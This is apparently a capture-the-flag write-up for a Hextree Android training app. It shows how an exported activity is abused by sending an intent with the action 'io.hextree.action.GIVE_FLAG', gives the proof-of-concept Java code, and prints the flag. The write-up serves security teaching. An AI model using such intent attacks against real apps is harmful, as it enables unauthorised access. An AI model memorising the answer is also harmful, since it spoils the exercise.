Static Analysis
AndroidManifest.xml
Upon inspecting the Flag2Activity in the AndroidManifest.xml file we see the following
<activity
android:name="io.hextree.attacksurface.activities.Flag2Activity"
android:exported="true">
<intent-filter>Since exported is set to true we can call this activity from our exploit apk, let’s review the code to see how can we get the flag
Flag2Activity Class
public class Flag2Activity extends AppCompactActivity {
public Flag2Activity() {
this.name = "Flag 2 - Intent with extras";
this.flag = "isqgqnB4bH/YSoOdSSLAG9gapPgYCyFBT7e3/3lUoAfTX5K9HeR5F8xSBndpPZT1";
}
@Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
protected void onCreate(Bundle bundle) {
super.onCreate(bundle);
this.f = new LogHelper(this);
String action = getIntent().getAction();
if (action == null || !action.equals("io.hextree.action.GIVE_FLAG")) {
return;
}
this.f.addTag(action);
success(this);
}
}We can see here that if the intent didn’t have an action set to io.hextree.action.GIVE_FLAG it will return without giving us the flag so all we need here is to send the intent with this specific action
Creating POC
In our APK we add a button that fires an intent with the desired action to Flag2Activity
Button button = findViewById(R.id.button_flag2);
button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Log.v("HEXTREE", "Going to flag 2 activity");
Intent intent = new Intent();
intent.setComponent(
new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag2Activity"));
intent.setAction("io.hextree.action.GIVE_FLAG");
startActivity(intent);
}
});Flag
HXT{intent-actions-activity-dsj198w}